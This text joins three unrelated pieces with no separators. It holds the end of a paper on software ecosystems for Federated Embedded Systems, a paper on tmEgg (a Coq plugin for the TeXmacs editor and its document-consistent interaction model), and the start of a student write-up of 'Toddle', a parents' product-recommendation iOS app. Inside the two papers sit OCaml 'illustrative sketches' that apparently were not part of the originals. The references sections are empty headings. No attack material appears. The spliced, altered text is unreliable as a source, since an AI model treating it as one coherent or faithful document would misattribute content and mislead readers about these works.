Furthermore, from a SoS viewpoint, the software components that constitute the federation's services may be enhanced by many different innovative technologies, for instance, open-source plugins. In addition, EcoFES services and components may be made available to third-party players in the ecosystem that develop new plug-in software components.
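To make the plug-in mechanism mentioned above (plug-ins that reach base-system sensors and actuators only through defined interfaces) a little more concrete, the following is a purely illustrative sketch of what such an interface could look like. All names are invented; the sketch is not taken from AUTOSAR, from [1], or from any existing platform, and a real FES platform would add its own typing, scheduling, resource and safety mechanisms.

```ocaml
(* Illustrative sketch only: a hypothetical, minimal interface between a
   base embedded system and third-party plug-ins in a federated setup. *)

module type BASE_SYSTEM = sig
  val read_sensor : id:string -> float option
  (* Read the current value of a named sensor, if the sensor exists. *)

  val command_actuator : id:string -> value:float -> (unit, string) result
  (* Request an actuation; the base system may refuse, e.g. for safety. *)
end

module type PLUGIN = sig
  val name : string

  val step : (module BASE_SYSTEM) -> unit
  (* Called periodically by the base system within its own schedule. *)
end

(* A toy third-party plug-in: switch a fan on when the temperature is high. *)
module Fan_plugin : PLUGIN = struct
  let name = "fan-controller"

  let step (module B : BASE_SYSTEM) =
    match B.read_sensor ~id:"cabin-temperature" with
    | Some t when t > 28.0 ->
        (* The base system, not the plug-in, decides whether to honour this. *)
        (match B.command_actuator ~id:"fan" ~value:1.0 with
         | Ok () -> ()
         | Error _reason -> ())
    | Some _ | None -> ()
end
```

The only point of the sketch is the division of responsibility: the plug-in can observe and request, but the base system retains the final say over actuation, which is one way a manufacturer can keep control over its products while still opening the platform to external developers.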
2.1 Motivation
The motivation for conducting research in the context of EcoFES stems from the recent trends in software markets to open up for networked mass customisation and production [8]. Examples include apps for mobile devices, and software product-lines [2] that adopt an ecosystem approach and provide extended features to users. Failure to open up, according to Jansen et al. [8], causes a decrease in sales, loss of jobs, jeopardises intellectual property and results in unhealthy markets. From an ES perspective we find several issues and concerns that motivate further investigation:
- Identifying players, roles, rules and supporting processes, methods, tools, and the technical infrastructure that cultivate an open, innovative and collaborative environment for next-generation ES.
- Forming ethical and democratic strategies that facilitate control, coordination and integration, release planning and project management, as well as evaluating alternative software architectures, development methods, reuse levels and make-or-buy options between manufacturers, suppliers and other third-party developers.
- Forming principles based on state-of-the-art practices and the research frontier. This requires empirical data from current practices and research, including experiences from researchers and practitioners regarding FES development.
2.2 EcoFES Benefits
The benefits of open ecosystems in the FES context include:
- Creating better and smarter products, at lower costs and more efficiently. Collaboration promotes innovation and shares the costs of adopting the most recent technology. It minimises lead time for new products, and development and maintenance costs may be amortised over multiple parties. The products have more flexible architectures and are thus more easily adapted to respond to change, even after the initial deployment.
- Moving development closer to the markets. This will create an ecosystem that is more sensitive to market trends, and thus more likely to offer products that are better aligned with market expectations and requirements, as well as to better support recent mass customisation trends.
- Creating a community for collaboration that attracts and locks in new and existing players. It offers organisation, product and application platform sustainability, once players are enabled to work collaboratively and dynamically for longer periods rather than on only one product or on a project basis.
3. ARCHITECTURAL CHALLENGES
In this section we discuss the main challenges related to the EcoFES architecture. EcoFES combines several architectural views. Challenges are discussed reflecting the categories that we consider the most important: a) organisational, b) technical, and c) business. They are expressed and discussed from the particular viewpoint where dedicated ecosystems targeting specific markets participate in a larger federated ecosystem.
3.1 Organisational Challenges
The organisational architecture involves several challenges. Firstly, the players and their roles need to be identified and classified within the EcoFES. New organisational structures and ways of working (protocols) are required with regard to the processes and means of interaction used. New collaboration mechanisms need to be defined for developing, integrating and managing products throughout their life-cycle.
For instance, defining a key role in the ecosystem (e.g., the manufacturer) that ensures the various technical challenges discussed later (such as dependability, interoperability, data management, architectural design, heterogeneity of components, life-cycle management and efficient coordination) are adequately addressed is one way to tackle the overall complexity of aligning and supporting external and internal players' collaborations. The manufacturer must also provide a certain level of tool/platform support, e.g., simulators, which can be understood and used by third-party software developers to test their plug-ins without having access to all the details of the base product. This ensures that the manufacturer can maintain some control over the products. Thus, the organisational challenge includes designing and providing stable structures so that the business model can work efficiently, protect the interests/rights of all related players, ensure sustainability and ethical governance, and, at the same time, satisfy the players' overall goals.
3.2 Technical Challenges
The technical challenges are identified in relation to the phase of development, i.e., a) initiation and definition, b) implementation, and c) integration and delivery. The main technical concerns are discussed below.
3.2.1 Initiation and Definition
During the definition of the product the architecture subsumes traditional product-line software architecture. Thus, in terms of technical and procedural specifications, the EcoFES concept will need to tackle several challenges that cut across more than one system and component. The processes need to support building multiple complex units of distributed functionality, such as the systems developed in the case of ES. Thus, in terms of specifications, qualitative descriptions need to be supported and automated as much as possible. This will reduce the risks and costs of modifying specifications later in the life-cycle.
3.2.2 Implementation
Dependability is a key property for embedded and real-time systems. In an EcoFES, components and services will address cross-cutting, sometimes conflicting domains and be provided by different players. This triggers an abundance of challenges, involving composability, adaptability, flexibility, robustness and reliability of the processes and tools used. The particular type of required composability needs to be addressed at the service/component design, orchestration and choreography level. Adaptability and flexibility refer to offering explicit variability at different levels to respond to environment and domain specific requirements. Variability occurs in most concerns, including functionality and different quality concerns. An additional challenge at the definition level is to support mixed criticality. Support for the real-time properties and physical resource constraints of ES requires special attention at the implementation level. A common implementation platform that supports the functionality of the SoS as well as of its constituent parts must be established by the ecosystem. This introduces additional dependencies and increases architecture complexity. Quality attributes are inherently cross-cutting, and in an EcoFES the dependencies will cut across ecosystems and players. This will create several risks that must be mitigated at the implementation level of the EcoFES platform. Thus, such a platform needs to be dependable, i.e., support criticality, and be continuously responsive and robust.
Criticality relates to the availability of the SoS, robustness to failure handling and system recovery, while reliability considers the continuity and integrity of the services provided. Another challenge for the technical architecture is reusability, i.e., developing to support reuse and developing with reuse. This challenge requires that a reuse strategy is defined on the federation level. The strategy specifies the required level of reuse in each constituent ecosystem and provides an adequate methodology to support synchronisation and coordination. In addition, dependencies between constituent ecosystems' assets, such as software product-lines, software libraries, and toolkits, should be made explicit. However, in collaborative environments such as EcoFES, reaching an agreement on reuse strategies will involve complex business strategy considerations and will be influenced by the business models players select. All of this together makes reuse a key challenge for the successful implementation of EcoFES.
3.2.3 Integration and Delivery
As the manufacturer is responsible for integration and systems testing at product delivery, the overall complexity and criticality of the products add to the overall complexity of the process. Openness in collaboration to promote innovation is considered a major challenge, especially in the case of closed markets where a manufacturer requires control over products and processes, considering them core business assets and intellectual property. Finding ways to share knowledge and technology in a secure, trusted, collaborative and creative way is a fundamental challenge due to the lack of supporting frameworks and mechanisms that guarantee the controlled internal and external flow of information within and across organisations and to independent third parties [7].
3.3 Business Challenges
3.3.1 Analyse Competitive Landscape
Identifying new and innovative business models for ES in the context of federated ecosystems involves several challenges. The EcoFES structures will be established in highly competitive landscapes, where players demand an increase in connected systems and services, efficiency, productivity and quality, but also reduced costs, time-to-market, and delivery [7]. In many cases, such conflicting requirements need to be satisfied as the involved players come from different domains (e.g., manufacturers, suppliers, end-users). Additional barriers for a successful adoption of EcoFES include trust and conflicting business goals and strategies. Thus, a prerequisite for the successful formation of EcoFES is to study the players. This involves identifying their roles, policies, communication processes and tools, and aligning them with other players and their characteristics. A likely scenario for a specific EcoFES is to analyse multiple dimensions and define rules that mitigate risks connected to competition, negotiation, and licensing and ownership conflicts between the players [7].
3.3.2 Formalise the Business Models
A challenge that follows from the analysis is the definition of the business models that EcoFES should support. The models manifest the contracts negotiated and agreed to by current and future players. The models should be specified to ensure delivery of value, to support the development of strategies that preserve economic health in the market, and to formally serve players, their roles, and interactions. Jansen et al.
[7] explain the challenges of formalising such an ecosystem: players need to realise their role, and manufacturers need to face risks such as opening their product interfaces, knowledge bases and source code to other parties. Thus, the formalisation of business rules that enforce the required openness to support open innovation, while preserving the intricate properties specific to ES such as real-time constraints and safety, is required. A novel challenge in this context is to support new and refined models after the EcoFES has been activated. This requires that the effects of a proposed change are analysed and communicated and, if necessary, negotiated among affected players before its introduction to the EcoFES.
3.3.3 Enforce Sustainability
The third business challenge relates to ecosystem sustainability and includes the ecosystem's processes and products. EcoFES services should provide the necessary business opportunities for external players to develop added value. However, EcoFES has inherent weaknesses in its fundamental principles that must be mitigated before it is activated. The openness promoted by EcoFES is not just a strength, but also a weakness. A player may for instance decide to leave the ecosystem federation, which affects an EcoFES at many levels. Achieving long-term sustainability requires an understanding of the challenges and risks involved upfront. Sharing assets and information while depending on others creates a degree of uncertainty that should be mitigated. This could influence the business decisions, models and strategies of the players collaborating with respect to market and technology shifts. This situation is similar to a reuse strategy that involves external players. However, EcoFES principles such as the degree of openness and the tight coupling between systems in the targeted product domains amplify the complexity.
4. RELATED WORK
The term "ecosystem" was introduced by Iansiti and Levien, who described the notion of business ecosystems through the examples of Wal-Mart and Microsoft [6]. In their article the authors explained the benefits of adopting "ecosystem thinking" from a business perspective and discussed various strategies organisations may utilise, based on their role in the ecosystem. The term "software ecosystem" was introduced by Messerschmitt and Szyperski [9] and later extended by Bosch [2]. In particular, Bosch extended the classical "product-line thinking" of software products. Bosch identified two reasons for the trend towards open platforms: firstly, it is too expensive for a manufacturer to develop alone all the functionality that customers would wish for, and secondly, gathering the requirements for customisation could potentially be done more efficiently through an open platform. He also classified ecosystems according to two dimensions: the type of platform used (desktop, web or mobile) and the level at which the ecosystem is created (on an operating system, application software, or own user-developed code). Hansson and Dybå [5] described in their work a systematic overview of software ecosystems and explained several related challenges, which overlap to a high degree with those reported by Chesbrough [4] as challenges of open innovation in open business models. Jansen et al.
[7] presented a research agenda for software ecosystems, discussed the main challenges involved at the technical and business levels along three dimensions: a) the software ecosystem level, b) the software supply network level, and c) the software vendor level, and also mentioned issues of formal modelling, transparency, guidelines, standards, and actions that are of central importance. Research on ecosystems for ES is highly significant to our work, but very few related publications exist. Also, to the best of the authors' knowledge, the concept of "open innovation" in ES, in particular when federations are formed, is hardly mentioned, and research in this direction therefore lacks a broad and well-established knowledge base on the combination of these topics.
5. CONCLUSIONS AND FUTURE WORK
This paper described the concept, motivation, benefits and challenges for developing Systems of Systems (SoS) based on the notion of Federated Embedded Systems (FES). In particular, the focus has been on forming an ecosystem to wrap the players, processes, strategies and products. Our work provides foundations for our future work and the research we are currently conducting. The aim of our research is to cover the following topics: (1) How would an innovative open SoS based on FES be described and modelled? (2) How could the SoS be controlled? (3) How would the virtual players and development teams be better organised? (4) What are the relationships between the different actors? (5) How would quality be ensured? (6) How should technology be structured? (7) How are intellectual property rights handled? And finally, (8) what are the potential business models that should be established to support the process? The overarching aim of the research is a formal conceptualisation of the SoS for EcoFES which can be used for prototyping, deployment and commercialisation. Our on-going research activities involve combining knowledge of technology solutions and software engineering with expertise in processes and models to create a deeper understanding of how to best design the ecosystems for open innovation where products will contain FES. Other activities include carrying out a systematic mapping and a systematic literature review to provide a high-level view on the related literature and clarify the major streams of research, application domains, industrial parties, and implications on business models, development methods and product architectures.
6. ACKNOWLEDGMENTS
This research was funded by VINNOVA, the Swedish Agency for Innovation Systems (grant no. 2012-03782).
7. REFERENCES
A Document-Oriented Coq Plugin for TeXmacs
Herman Geuvers, Lionel Elie Mamane
10th August 2006
Abstract
This article discusses the integration of the authoring of a mathematical document with the formalisation of the mathematics contained in that document. To achieve this we have started the development of a Coq plugin for the TeXmacs scientific editor, called tmEgg. TeXmacs allows the wysiwyg editing of mathematical documents, much in the style of LaTeX. Our plugin makes it possible to integrate into a TeXmacs document mathematics formalised in the Coq proof assistant: formal definitions, lemmas and proofs. The plugin is still under development. Its main current hallmark is a document-consistent interaction model, instead of the calculator-like approach usual for TeXmacs plugins. This means that the Coq code in the TeXmacs document is interpreted as one (consistent) Coq file: executing a Coq command in the document means executing it in the context (state) of all the Coq commands before it.
1 Introduction
TeXmacs ([vdH04]) is a tool for editing mathematical documents in a wysiwyg style. The input an author types is close to LaTeX, but the output is rendered directly on screen in a pretty-printed way. TeXmacs supports structured editing and it stores the files in a structured way using tags, which is close to XML. So, a TeXmacs document is a labelled tree. The labels (tags) provide information that can be used as content or display information. For a specific label, the user can choose a specific way of rendering the subtrees under a node with that label, for example rendering all subtrees in math mode. But a user may also choose a specific action for the subtrees, for example sending the subtrees as commands to the computer algebra package Maple. Of course, many labels are predefined, like in LaTeX, so a user is not starting from scratch. TeXmacs facilitates interaction with other applications in an easy way: within TeXmacs one can open a "session", for example a Maple session, and then input text within that session is sent to a Maple process that is running in the background. The Maple output is input to the TeXmacs document in a structured way, and rendered accordingly. In this way, TeXmacs can be used as an interface for Maple, with the additional possibility to add text or mathematical formulas around the Maple session, creating a partially interactive mathematical document. Here the interaction lies in the possibility to execute parts of the document in the background application. In this paper we present tmEgg, a Coq plugin for TeXmacs. The plugin allows the user to call Coq from within a TeXmacs document, yielding a TeXmacs document interleaved with Coq sessions. It also provides special commands for Coq, like stating a definition or a lemma. The plugin does not provide its own proof language, but leverages any proof language that Coq understands or will understand in the future, such as [Cor06]. This means that when doing a proof, the user types actual Coq commands (usually tactics) in the TeXmacs document, which are then sent to Coq as-is and the Coq output is rendered by TeXmacs. This is in contrast with the approach of e.g. [The03], [DF05] or [ALW06], which seek to change the way a proof is written or the way a user interface interacts with the prover (relegated to a "backend" role) in a much more fundamental way. A crucial aspect of the plugin is that it views the sequence of Coq sessions within a document as one Coq file.
So, when one opens a document and executes a command within a Coq session, first all previous Coq commands (possibly in previous Coq sessions) are executed and the present command is then executed in the Coq state thus obtained. So the TeXmacs document as a whole also constitutes a valid Coq development. Additionally, one can backtrack to a command within a previous session, jumping to the Coq state at that point of the development. From the Coq perspective, one can thus see the TeXmacs document as a documentation of the underlying Coq file. Using TeXmacs, one adds pretty-printed versions of the definitions and lemmas. The plugin further supports this by a folding (hiding) mechanism: a lemma statement has a folded version, showing only the pretty-printed (standard mathematical) statement of the lemma, and an unfolded version, showing also the Coq statement of the lemma. A further unfolding also shows the Coq proof of the lemma.
Altogether there are four ways of seeing the tmEgg TeXmacs plugin. These are not disjoint or orthogonal, but it is good to distinguish them and to consider the various requirements that they impose upon our plugin.
**A Coq interface.** One can call Coq from within TeXmacs, thus providing an interface to Coq. When the user presses the return key in a Coq interaction field, the Coq commands in this field are sent to Coq and Coq returns the result to TeXmacs. The plugin doesn't do any pretty printing of Coq output (yet), but it allows saving a Coq development as a TeXmacs file which can be replayed. Purely as an interface the plugin does about the same as Proof General ([Asp00]) or CoqIDE ([Teab]).
**A documented Coq formalisation.** A Coq formalisation usually has explanatory comments to give intuitions of the definitions, lemmas and proofs or to give a mathematical (e.g. in LaTeX) explanation of the formal Coq code. The plugin can be used for doing just that: the traditional TeXmacs elements are used for commenting the underlying Coq file. In this respect, tmEgg can play the same role as Coqdoc ([Teab]), but also more. Coqdoc extracts document snippets (in HTML or LaTeX format) from specially formatted comments in Coq scripts (.v files), and creates an HTML or LaTeX document containing these snippets and the vernacular statements (or only gallina, that is the statements without proofs) verbatim, along with some basic pretty-printing of terms. Where the use of Coqdoc restricts the user to choosing between having the explanatory comments rendered (as an HTML or LaTeX document) and interacting with Coq (in the "source" .v file), tmEgg enables the user to have both at the same time, while keeping the property that the document can be read without Coq, and exported to a format that can be read without TeXmacs (but without Coq interaction), such as HTML, PostScript, PDF, ... Taking this use case to its extreme, one arrives at a notion of literate proving, by analogy to literate programming.
**A mathematical document with a Coq formalisation underneath.** One can write a mathematical article in TeXmacs, like one does in LaTeX. Thus, one can take a mathematical article and extend it with formal statements and proofs. Due to the folding mechanism, the "view" of the article where everything is folded can be the original article one started with. It should be noted that, if one adds a Coq formalisation underneath this, not everything needs to be formalised: lemmas can be left unproven etc., as long as the Coq file is consistent, i.e. no notions are used unless they are defined.
In this sense, tmEgg makes a step in the direction of the Formal Proof Sketches idea of [Wie04].
**Mathematical course notes with formal definitions and proofs.** We can use the TeXmacs document for course notes (handouts made by the teacher for students). An added value of our plugin is that we have formal definitions and proofs underneath, but we don't expect that to be a very appealing feature for students. On the other hand, we also have full access to Coq, so we can have exercises that are to be done with Coq, like "prove this statement" or "define this concept such that such and such property holds". This is comparable in its intent to ActiveMath ([MAB+01]).
In the following we present our plugin tmEgg, including some technical details and a fragment of a TeXmacs document with an underlying Coq formalisation. We will discuss the four views on the plugin as mentioned above in detail. An essential difference between the tmEgg Coq plugin that we have created and other TeXmacs plugins, e.g. the one for Maple, is that we take a document-oriented approach. This we will describe first.
2 The document-consistent model
The TeXmacs plugins to computer algebra or proof systems usually obey a temporal model of interaction, that is, the expressions given to the plugin are evaluated in chronological order, irrespective of their relative position in the document. In other words, the TeXmacs plugin system ignores the fact that the interpreter it is interfacing with has an internal state which is modified by the commands TeXmacs gives it and influences the results of these commands. This can lead to the document showing results that are not consistent with the natural reading order of the document, if the expressions are not evaluated in the order in which they appear, something which crops up naturally when writing a document: one sometimes goes back to improve on a previous statement or definition. Furthermore, the results shown by the document may be irreproducible, as the sequence of statements leading up to the state in which the expressions were evaluated can be lost. See figure 1 for an example: the left part shows an example of inconsistent output with the CAS Axiom. The third (in reading order) command was executed before the second but after the first, leading to the evaluation of \( a \) resulting in 6, while reading the document from top to bottom would suggest it should be 5 at this point. The situation would be even worse if \( a := 6 \) were to be deleted; the reason for \( a \) evaluating to 6 would be completely lost. Contrast with the right part, showing a tmEgg Coq session. Empty_set is predefined in Coq's standard library, and gets redefined in the second command. However, whatever the order in which the user asks for evaluation of the commands, the result shown will always be the one in the figure. E.g. if the user asks for evaluation of the second command (defining Empty_set to be 5) and then asks for the evaluation of the first one, the first command will always answer "Empty_set is an inductively defined type of sort Set without any constructor", not "Empty_set is 5".
![Figure 1: Example of inconsistent and consistent output](image)
This risk of inconsistency is naturally highly undesirable in the context of writing formal mathematics, leading to a *document-consistent* model of interaction: a statement is always evaluated in the context defined by evaluating all statements before it in the document, in document order, starting from a blank state.
2.1 Implementation
Coq 8.1 thankfully provides basic framework support for this, in the form of a backtrack command that can restore the state to a past point \( B \). It works under the condition that no structure (section, definition, lemma, ...) whose definition is currently finished was open (incomplete) at point \( B \). If this condition is not satisfied, tmEgg backtracks up to a point before \( B \) where this condition does hold and then replays the statements between that point and \( B \). The arguments given to the backtrack command are derived from state information that Coq gives after completion of each command, in the prompt. tmEgg stores the information on the Coq state *before* a command as a state marker next to the command itself, that is, a document subtree whose rendering is the empty string. This state information consists (roughly speaking) of the number of definitions made in the current session, the list of open definitions and the number of steps made in the current open definition, if any. tmEgg also keeps track of the position in the document of the last command executed by Coq. This is used at Coq command execution time to determine whether a backtrack or a forward jump is necessary before the command can be evaluated.
3 Presentation of tmEgg
tmEgg extends TeXmacs with Coq interaction fields. One can naturally freely interleave Coq interaction fields with usual document constructs, permitting one to interleave the formal mathematics in Coq and its presentation in LaTeX-level mathematics. Each Coq interaction can be folded away at the press of a button, as well as each specific result of a command individually. The output of the previous command is automatically folded upon evaluation of a command. See figure 2 for an example: the empty circles indicate a folded part and can be clicked to unfold that part, and the full circles indicate a foldable unfolded part and can be clicked to fold it. Here, the formal counterpart to hypothesis 2 is completely folded, while the statement of lemma 3 is unfolded and its proof folded. The proof of lemma 4 is unfolded, but the result of most of its steps is folded.
![Figure 2: tmEgg screenshot, showing a "Nested Intervals" development: hypotheses on two real sequences a and b, Lemma 3 (a is monotone) with its Coq statement unfolded, and Lemma 4 (b is monotone) with its Coq proof steps partially unfolded](image)
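As a rough illustration of the bookkeeping described in Section 2.1 above, the following OCaml sketch shows one way the state markers and the backtrack-versus-replay decision could be represented. It is only a sketch under invented names and simplified assumptions: tmEgg keeps most of this logic in Scheme inside TeXmacs, and the real arguments of Coq's backtrack command are derived from the prompt rather than computed as below.

```ocaml
(* Illustrative sketch only: invented names, not tmEgg's actual code. *)

(* The information stored in a state marker next to each Coq command. *)
type state_marker = {
  definitions_done : int;          (* definitions completed in this session *)
  open_definitions : string list;  (* proofs/sections currently open        *)
  steps_in_open    : int;          (* proof steps inside the innermost one  *)
}

type position = int  (* index of a command in document order *)

type action =
  | Run_forward of position * position  (* replay the commands in this range *)
  | Backtrack_to of position            (* jump back, then evaluate          *)

(* Decide what to do before evaluating the command at [target], given the
   position of the last command Coq actually executed. *)
let plan ~last_executed ~target : action =
  if target > last_executed then
    (* Moving forward: the intervening commands must be (re)played in
       document order so the state stays document-consistent. *)
    Run_forward (last_executed + 1, target)
  else
    (* Moving backward: rely on Coq's backtracking; a real implementation
       must fall back to replaying from an earlier point when the condition
       on open definitions is not met. *)
    Backtrack_to target
```

The sketch only captures the asymmetry described above: going forward means replaying the intervening commands, while going backward relies on Coq's backtrack command, with replay as the fallback when its precondition does not hold.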
Note that the result of each Coq command is inserted into the document statically (and replaced upon reevaluation); this means that the results can be copied and pasted like any part of the document, but also that the saved file contains them, so that the development can be followed without running Coq, a potentially lengthy operation. As a corollary, the development can even be followed (but not independently checked) on a computer lacking Coq. In order to help the user create the proposed "formal and informal version of the same mathematics" structure (particularly in the "mathematical document with a Coq formalisation underneath" scenario), we present him with a menu where he can choose a Coq statement type (such as Lemma, Hypothesis, Definition, ...) and that will create an empty template to fill in, made of:
- the corresponding TeXmacs theorem-like environment for the informal statement;
- a foldable Coq interaction field for the formal statement;
- a foldable Coq interaction field for the body of the informal statement, if appropriate.
This is illustrated in figure 3.
![Figure 3: New statement menu, empty lemma structure](image)
3.1 Architecture
We have decided to try to minimise the changes to Coq itself for this project, and in particular to try not to put TeXmacs protocol or syntax specific code in Coq. That is why, rather than adapt Coq to speak the TeXmacs plugin protocol by itself, we have implemented a wrapper in OCaml that translates from Coq to TeXmacs (see figure 4). We try to keep that wrapper as simple and stateless as possible, putting most of the intelligence of the plugin in Scheme in TeXmacs.
4 How well does the plugin do?
In the introduction, we have described four views (possible applications) on the tmEgg plugin. We now want to discuss to what extent the plugin satisfies the requirements for each of those views.
**A Coq interface.** One can do Coq from within a TeXmacs document using our plugin, but, compared to well-known interfaces like Proof General ([Asp00]) and CoqIDE ([Teab]), the plugin is in particular worse in terms of the display of the proof state: the proof state is displayed *inside* the document, which can clutter things up.
From a purely user-interface-for-theorem-provers perspective, a reserved fixed-size area for displaying the proof state is sometimes better, in particular to contain the proof state when it grows unwieldy. Other things that our plugin does not support but that are possible to add in TeXmacs are menus for special tactics and pretty printing (but Proof General and CoqIDE don't have this either). Pretty printing is of course interesting to add in the context of TeXmacs, because it has various LaTeX-like facilities to add it. However, it should be noted that, if we want to use our plugin as an interface for Coq, the syntax should be accepted as *input* syntax, too, so as not to confuse the user. The user may also (occasionally or structurally) prefer to use the default Coq pure text syntax rather than mathematical graphical notations; this will always be supported.
**A documented Coq formalisation.** As a documentation tool, the plugin works fine. One can easily add high-level mathematical explanations. It would be convenient to be able to load a whole (annotated, e.g. in Coqdoc syntax) Coq file into TeXmacs and then continue further annotating it; we intend to write such an import tool in the future. Note however that there is no (formal) link between the formal Coq and the high-level explanation in TeXmacs, because the high-level translation is not a translation of the Coq code, but added by a human. This is different from, e.g., the work in the Mowgli ([AW02]) project, where we have a high-level rendering of the formal Coq statements.
**A mathematical document with a Coq formalisation underneath.** This is a way the plugin can be used now. One would probably want to hide even more details, so more folding would be desirable, e.g. folding a whole series of lemmas into one "main lemma" which is the conclusion of that series. Thus one would be able to create a higher level of abstraction, as is usual in mathematical documents. Of course this can already be done in TeXmacs, but our plugin does not specifically propose it automatically. If such nested folding were added, it would also be advisable to be able to display the "folding structure" separately, to give the high-level structure of the document.
**Mathematical course notes with formal definitions and proofs.** In general, proof assistants are tools that require quite some maturity to be used, so we don't expect students to easily make an exercise in their TeXmacs course notes using the underlying proof assistant Coq, i.e. as an exercise in the mathematics studied rather than as an exercise in Coq. This situation may improve in the future though, depending on the maturity of proof assistant technology. It should also be noted that the plugin does not (yet) explain/render the Coq formalised proofs, like e.g. the Helm tool ([APC+03]) does (by translating a formal proof into a mathematically readable proof). See also [AGL+06].
5 Future Outlooks
5.1 Mathematical input/output
Current TeXmacs interfaces to computer algebra systems include conversion to and from mathematical notations (see figure 5).
![Figure 5: Mathematical notation input/output with Axiom: the input 5^2 + 18 evaluates to 43 (Type: PositiveInteger), and integrate(x^2, x) evaluates to (1/3)x^3 (Type: Polynomial Fraction Integer)](image)
Doing the same with Coq brings some difficulties in a more acute way than with a CAS:
- Different developments will call for the same notation to map to different Coq objects; there are for example several different real number implementations for Coq.
- Similarly, the best notation to use for the same Coq construct will vary depending on the document, where in the document one is, or even more subtle factors. A prime example of this is parentheses around associative operators: one usually doesn't want full parenthesisation in statements, but if one always leaves out "unnecessary" parentheses, the statement of the associativity lemma itself looks quite pointless, as do the proof steps consisting of applying the associativity lemma.
- Some Coq constructs (such as some ways to define division) need information that is not part of usual mathematical notation (such as a proof that the divisor is not zero).
The notations will thus probably have to be highly dynamic; if making good choices automatically proves impossible, maybe a good compromise will be to let the author of the document choose on a case-by-case basis. Once at least the conversion to mathematical notation is satisfying, we can make a TeXmacs command that takes a Coq term (or the name of one) and whose rendering is the "nice" mathematical rendering for that term. This means that users will be able to put Coq terms in their documents and have them look like LaTeX-level mathematics. This conversion from and to "normal" mathematical notation might also form a usable mechanism for informal and unsafe exchange of terms between different computer algebra systems and proof assistants. E.g. if the Coq goal to prove is \( x^{18} - 5x^7 + 5 = 0 \rightarrow x > 2 \), the user could select in the goal the expression \( x^{18} - 5x^7 + 5 = 0 \) (duly converted from Coq term to mathematical notation by tmEgg), paste it into a CAS session and ask the CAS to solve that equation (where the TeXmacs-CAS integration plugin will duly convert it to the syntax of the CAS being used) to quickly check whether the goal is provable, or use the CAS as an oracle to find the roots and use knowledge of the roots to make the proof easier to write.
5.2 Communication with Coq
The wrapper currently interacts with Coq through the coqtop -emacs protocol, that is, the human-oriented coqtop protocol (a tutorial to Coq is available at http://coq.inria.fr/doc/tutorial.html), very slightly extended to be more convenient for programs. However, this protocol presents a few suboptimalities for our purposes:
- There is no documented, robust way to determine whether a command you gave failed, gave a warning or succeeded. (Naturally, the existing interfaces have organically grown rules about parsing Coq's answer that will usually succeed in this task.)
- Terms are pretty-printed back to the original input syntax, which is non-trivial to parse and interpret; it has some overloading and in particular relies on typing information.
In order to implement the "mathematical notation input/output" with TeXmacs, we would like to get the terms at a lower level, as trees. We thus plan to implement a good generic interface protocol for Coq that will hopefully be able to serve the needs of several interfaces at once. We intend to revive and extend the protocol used by Centaur and PCoq ([Tea]). Its main advantage is that it presents terms as trees, in an easily parsed reverse polish notation with explicit arity. Other interfaces (as well as tmEgg) will (sometimes or always) want to get the usual text pretty-printed format, so this terms-as-trees feature will be made optional. However, this protocol in its current state does not integrate the rather new backtracking feature; we will extend it so that it does.
5.3 Miscellaneous
Once the basic framework of tmEgg has matured and works well, all kinds of small, but highly useful, features can be imagined:
- Import of Coq files containing Coqdoc document snippets, leveraging the LaTeX import of TeXmacs.
- Automatic generation of a table of Coq constructs in the document and a corresponding index.
- Similarly, a menu command to jump to the definition of a particular Coq object.
- Making any place where a Coq object (e.g. a lemma) is used a hyperlink to its definition. This could even eventually be expanded up to making tmEgg a Coq library browser.
References
toddle
Andrea Angquist, Naehee Kim, Vimal Kini
Advisor: Robert Glushko
OVERVIEW
Toddle is an iOS app that allows parents to quickly and easily share recommendations or warnings about children's products with their friends. Parents can take a photo of a kids' product, let others know if it's a product they love or hate, share comments on why, and post this information for their friends to see. Users can see what products their friends are posting, how they feel about them and for what ages they are appropriate. Parents can use Toddle to help their friends purchase the best products possible for their children, while avoiding products that aren't worth purchasing, are unsafe, or are of poor quality. As kids get older, Toddle makes it easy for parents, grandparents and their friends to see which products will meet kids' changing needs. Toddle lets users ask each other for product advice, share their expertise, and give away or sell products that their kids no longer need.
Our group felt that there was room in the marketplace for an information service that helped facilitate the sharing of product recommendations amongst friends. From previous projects and research, we knew that a personal recommendation from a friend is generally much more valuable to users than a recommendation, or several recommendations, from strangers. Additionally, being able to look up anonymous product reviews while in a store on a mobile device was something that we all thought helpful, but we didn't know of an existing way to easily access or solicit product advice from friends while on the go. Right now, information services such as Yelp and Angie's List provide reviews of services and local businesses for free or for a fee, but don't provide reviews for products. Sites like Amazon and many other shopping sites often provide product reviews, but many of these sites aren't integrated with social networking sites or email to allow you to see only reviews made by trusted people in your network. While these sites do provide reviews, they attempt to cover a broad range of business verticals, so the information they aggregate is likewise very broad; they generally don't allow for very specific product categorization or filtering and rarely allow users to differentiate reviews based on whether or not a person owns a product, how long they've owned it, etc. Lastly, the product overview or recommendation areas of shopping websites are very rarely optimized for mobile devices. As a result, we agreed to design a mobile app that allows for an improved product recommendation experience amongst friends.
MARKET
Rather than design a service for all products and customer segments, we decided to narrow our focus to one specific niche market. Since newer parents are often very passionate about researching purchases and providing product recommendations and reviews, we thought this demographic might be a good fit for our project. From personal experience we hypothesized that mothers spend a lot of time and effort searching for and evaluating products for their children. We did not, however, want to limit ourselves to children's products without first conducting user research to see if we could identify a more suitable market. In an initial round of user research, we interviewed ten people, six of whom were parents.
We were interested in finding product categories where users heavily researched or discussed products before making a purchasing decision, as our overall hypothesis was that our app would be used the most by people needing specific product advice or by people currently being asked for product advice. In our interviews, we found that the product categories most heavily researched and discussed by consumers were:
- Autos
- Electronics
- Books and movies
- Children's products
- Women's clothing
Moms were much more interested in soliciting and providing recommendations for kids' products than for products for themselves, and they spent more time researching children's products before purchasing and much more time discussing those products after purchase than they did for other product categories. As a result, we concluded that narrowing the scope of our service to baby and children's products would allow us to tap into a very engaged and passionate customer base. Additionally, by focusing on one product group, we could provide users with a more customized design, look and feel, and a much more detailed product categorization scheme than sites like Amazon currently provide.
COMPETITIVE ANALYSIS
Similar products in our market can be broadly categorized into the following:
**Retailers**
Retailers like Amazon, Target, Babies R Us and Toys R Us have a huge customer base and a very wide variety of products. Most of them also have a well-established e-commerce presence, where users can find and buy products, write reviews and also determine product availability in brick-and-mortar stores. Users cannot directly compare products or brands on these retailers' websites and instead have to read user-submitted reviews or product ratings and then draw their own comparisons. These reviews and ratings are submitted by users but are limited to products sold by the retailers. Consumers cannot find out what their friends or other users like them are buying, as these e-commerce websites do not leverage social networks or provide transparent and robust user profiles.
**Social networks**
